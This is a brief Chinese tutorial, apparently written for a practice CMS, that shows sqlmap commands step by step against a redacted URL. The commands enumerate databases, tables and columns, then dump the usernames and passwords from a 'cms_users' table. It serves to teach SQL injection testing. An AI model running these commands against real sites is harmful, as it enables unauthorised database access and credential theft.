文章目录
CMS
1.寻找可能存在SQL注入点的页面
2.在SQLmap中输入注入命令
第一步:(打开sqlmap)
第二步:(猜解所有数据库名)
sqlmap -u "http://xxxxxxx/cms/show.php?id=38" --dbs
-u后写要注入的URL
–dbs指猜解所有的数据库名
爆破出的数据库名:
第三步:(猜解指定数据库的表名)
sqlmap -u "http://xxxxxxxx/cms/show.php?id=38" -D cms --tables
-D cms 指定数据库
–tables指猜解指定数据库中所有表名
爆破出的表名:
第四步:(猜解指定表的所有字段)
sqlmap -u "http://xxxxxxx/cms/show.php?id=38" -D cms -T cms_users --columns
-D cms 指定数据库
-T cms_users 指定数据库中的表名
–columns 猜解指定表的所有字段
爆破出的列名:
第五步:(猜解数据信息)
sqlmap -u "http://xxxxxxx/cms/show.php?id=38" -D cms -T cms_users -C username,password --dump
-D cms 指定数据库
-T cms_users 指定数据库中的表名
-C username,password 指定列名
–dump 猜解指定列的数据
爆破出的内容: